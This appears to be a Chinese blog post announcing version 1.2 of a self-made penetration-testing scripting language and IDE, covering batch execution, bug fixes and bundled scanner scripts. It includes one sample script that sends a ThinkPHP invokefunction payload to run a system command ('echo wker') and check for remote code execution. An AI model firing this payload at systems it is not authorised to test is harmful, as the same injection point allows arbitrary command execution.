之前1.0的时候发布了这篇文档:Wker_TestLangue渗透测试框架语言
最近不是太忙,所以更新了下面的内容:
Wker_TestLangue V 1.2
这次版本更新其实没有太多的变化,主要是修复了之前的一些bug,以及增加了一些方便的操作。
最主要的更新是增加了批量执行脚本的功能,这个功能是勾选上你需要选择执行的脚本,然后选择运行中的运行所有选中脚本。
就可以批量执行了。
双击脚本就可以看到脚本的源代码,然后运行就可以了:
但是漏洞探测的脚本需要注意的是,我们需要设置全局的url变量,因为:
#request url = var
#define payload = /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20wker
function main(args)
{
res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36");
if(StrFindStr(res[0],"wker",0)!= "-1")
{
print(url."存在thinkphp远程代码执行");
}
}
因为我都是使用了#request要求IDE检查是否设置了url,只有在全局变量中设置了才可以。
这次更新我也附带了104个脚本文件,里面各式各样的脚本都有(有一些是抄的),以后也会经常更新(关注官方源)。
当然误报是正常的,不能确定百分百的正确性,但是已经是很不错的了。
并且修复了一个github的加载bug,之前加载中文路径错误(其实是我写的时候忘记URL编码了...)现在也进行了修复。
里面附带了运行的方法,如果不懂,可以查看1.0的版本文档(在文章开头)
有什么bug的话呢大家提出来,我也好修改!